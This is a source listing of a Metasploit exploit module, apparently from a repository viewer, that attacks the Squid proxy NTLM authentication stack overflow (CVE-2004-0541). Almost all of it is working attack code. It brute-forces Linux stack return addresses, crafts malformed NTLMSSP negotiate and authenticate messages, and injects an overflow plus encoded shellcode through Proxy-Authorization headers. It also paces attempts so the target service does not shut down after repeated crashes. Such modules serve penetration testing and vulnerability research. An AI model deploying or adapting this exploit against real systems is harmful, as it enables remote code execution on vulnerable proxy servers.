root / modules / exploits / linux / proxy / squid_ntlm_authenticate.rb @ master
History | View | Annotate | Download (4.1 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# Framework web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/framework/
|
| 10 |
##
|
| 11 |
|
| 12 |
|
| 13 |
require 'msf/core'
|
| 14 |
|
| 15 |
|
| 16 |
class Metasploit3 < Msf::Exploit::Remote |
| 17 |
Rank = GreatRanking |
| 18 |
|
| 19 |
include Msf::Exploit::Brute |
| 20 |
include Msf::Exploit::Remote::Tcp |
| 21 |
|
| 22 |
def initialize(info = {}) |
| 23 |
super(update_info(info,
|
| 24 |
'Name' => 'Squid NTLM Authenticate Overflow', |
| 25 |
'Description' => %q{ |
| 26 |
This is an exploit for Squid\'s NTLM authenticate overflow |
| 27 |
(libntlmssp.c). Due to improper bounds checking in |
| 28 |
ntlm_check_auth, it is possible to overflow the 'pass' |
| 29 |
variable on the stack with user controlled data of a user |
| 30 |
defined length. Props to iDEFENSE for the advisory. |
| 31 |
},
|
| 32 |
'Author' => 'skape', |
| 33 |
'Version' => '$Revision$', |
| 34 |
'References' =>
|
| 35 |
[ |
| 36 |
[ 'CVE', '2004-0541'], |
| 37 |
[ 'OSVDB', '6791'], |
| 38 |
[ 'URL', 'http://www.idefense.com/application/poi/display?id=107'], |
| 39 |
[ 'BID', '10500'], |
| 40 |
], |
| 41 |
'Privileged' => false, |
| 42 |
'Payload' =>
|
| 43 |
{
|
| 44 |
'Space' => 256, |
| 45 |
'MinNops' => 16, |
| 46 |
'Prepend' => "\x31\xc9\xf7\xe1\x8d\x58\x0e\xb0\x30\x41\xcd\x80", |
| 47 |
'PrependEncoder' => "\x83\xec\x7f", |
| 48 |
|
| 49 |
}, |
| 50 |
'Targets' =>
|
| 51 |
[ |
| 52 |
[ 'Linux Bruteforce',
|
| 53 |
{
|
| 54 |
'Platform' => 'linux', |
| 55 |
'Bruteforce' =>
|
| 56 |
{
|
| 57 |
'Start' => { 'Ret' => 0xbfffcfbc, 'Valid' => 0xbfffcf9c }, |
| 58 |
'Stop' => { 'Ret' => 0xbffffffc, 'Valid' => 0xbffffffc }, |
| 59 |
'Step' => 0 |
| 60 |
} |
| 61 |
}, |
| 62 |
], |
| 63 |
], |
| 64 |
'DisclosureDate' => 'Jun 8 2004', |
| 65 |
'DefaultTarget' => 0)) |
| 66 |
|
| 67 |
register_advanced_options( |
| 68 |
[ |
| 69 |
# We must wait 15 seconds between each attempt so as to prevent
|
| 70 |
# squid from exiting completely after 5 crashes.
|
| 71 |
OptInt.new('BruteWait', [ false, "Delay between brute force attempts", 15 ]), |
| 72 |
], self.class)
|
| 73 |
end
|
| 74 |
|
| 75 |
def brute_exploit(addresses) |
| 76 |
site = "http://" + rand_text_alpha(rand(128)) + ".com" |
| 77 |
|
| 78 |
print_status("Trying 0x#{"%.8x" % addresses['Ret']}...")
|
| 79 |
connect |
| 80 |
|
| 81 |
trasnmit_negotiate(site) |
| 82 |
transmit_authenticate(site, addresses) |
| 83 |
|
| 84 |
handler |
| 85 |
disconnect |
| 86 |
end
|
| 87 |
|
| 88 |
def trasnmit_negotiate(site) |
| 89 |
negotiate = |
| 90 |
"NTLMSSP\x00" + # NTLMSSP identifier |
| 91 |
"\x01\x00\x00\x00" + # NTLMSSP_NEGOTIATE |
| 92 |
"\x07\x00\xb2\x07" + # flags |
| 93 |
"\x01\x00\x09\x00" + # workgroup len/max (1) |
| 94 |
"\x01\x00\x00\x00" + # workgroup offset (1) |
| 95 |
"\x01\x00\x03\x00" + # workstation len/max (1) |
| 96 |
"\x01\x00\x00\x00" # workstation offset (1) |
| 97 |
|
| 98 |
print_status("Sending NTLMSSP_NEGOTIATE (#{negotiate.length} bytes)")
|
| 99 |
req = |
| 100 |
"GET #{site} HTTP/1.1\r\n" +
|
| 101 |
"Proxy-Connection: Keep-Alive\r\n" +
|
| 102 |
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(negotiate)}\r\n" +
|
| 103 |
"\r\n"
|
| 104 |
sock.put(req) |
| 105 |
|
| 106 |
end
|
| 107 |
|
| 108 |
def transmit_authenticate(site, addresses) |
| 109 |
overflow = |
| 110 |
rand_text_alphanumeric(0x20) +
|
| 111 |
[addresses['Ret']].pack('V') + |
| 112 |
[addresses['Valid']].pack('V') + |
| 113 |
"\xff\x00\x00\x00"
|
| 114 |
shellcode = payload.encoded |
| 115 |
pass_len = [overflow.length + shellcode.length].pack('v')
|
| 116 |
authenticate = |
| 117 |
"NTLMSSP\x00" + # NTLMSSP identifier |
| 118 |
"\x03\x00\x00\x00" + # NTLMSSP_AUTHENTICATE |
| 119 |
pass_len + pass_len + # lanman response len/max
|
| 120 |
"\x38\x00\x00\x00" + # lanman response offset (56) |
| 121 |
"\x01\x00\x01\x00" + # nt response len/max (1) |
| 122 |
"\x01\x00\x00\x00" + # nt response offset (1) |
| 123 |
"\x01\x00\x01\x00" + # domain name len/max (1) |
| 124 |
"\x01\x00\x00\x00" + # domain name offset (1) |
| 125 |
"\x01\x00\x01\x00" + # user name (1) |
| 126 |
"\x01\x00\x00\x00" + # user name offset (1) |
| 127 |
"\x00\x00\x00\x00" + # session key |
| 128 |
"\x8b\x00\x00\x00" + # session key |
| 129 |
"\x06\x82\x00\x02" + # flags |
| 130 |
overflow + shellcode |
| 131 |
|
| 132 |
print_status("Sending NTLMSSP_AUTHENTICATE (#{authenticate.length} bytes)")
|
| 133 |
req = |
| 134 |
"GET #{site} HTTP/1.1\r\n" +
|
| 135 |
"Proxy-Connection: Keep-Alive\r\n" +
|
| 136 |
"Proxy-Authorization: NTLM #{Rex::Text.encode_base64(authenticate)}\r\n" +
|
| 137 |
"\r\n"
|
| 138 |
sock.put(req) |
| 139 |
end
|
| 140 |
|
| 141 |
end
|